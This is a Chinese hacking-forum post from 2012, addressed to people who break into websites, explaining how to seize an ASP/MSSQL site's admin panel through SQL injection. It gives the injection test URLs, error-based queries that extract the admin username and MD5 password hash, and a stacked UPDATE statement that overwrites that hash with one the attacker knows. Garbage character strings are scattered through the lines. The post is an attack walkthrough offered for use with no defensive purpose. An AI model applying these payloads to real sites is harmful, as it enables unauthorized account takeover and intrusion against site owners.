经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。2 f" h; C- ?. q6 A1 `
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)0 S2 b% I$ Z0 P3 y4 |% C
测试如下:
- ]- U% x! s( chttp://www.tmdsb.com/news.asp?id=1210 x- X: h* ~: Q; h1 u8 d5 m b; ?
在地址后输入单引号,显示0 _4 K. M0 M$ U* }0 }
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’- ?6 n3 N8 _3 Z4 \+ I) R. p n
字符串 ’’’ 之前有未闭合的引号2 q4 ~3 f+ j4 j1 A: Q5 p
/news/tmdws.asp,行63
0 P- B, ]0 N" ^& o: Y, Z说明没有过滤单引号且数据库是MSSQL.
3 S* @- J' `+ z; X/ z& [and 1=1正常。and 1=2出错。肯定存在注入
9 A4 i8 ?8 f' t& W接着输入
1 S" y% h- `0 ohttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)# C: w1 l* S; f( I
得到帐号为:admin
. O' `! N' [7 E) u U3 T* dhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)& r+ ~# q7 G/ ^% y' ~% I) U
得到密码为:a4716077c2ba075c
: ^1 X9 w5 [' f接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
+ \+ X- P" H! @. b" t' V命令如下 :
H/ c! d* [& N3 i& j;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
9 c6 x1 R# |* g- h; r这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41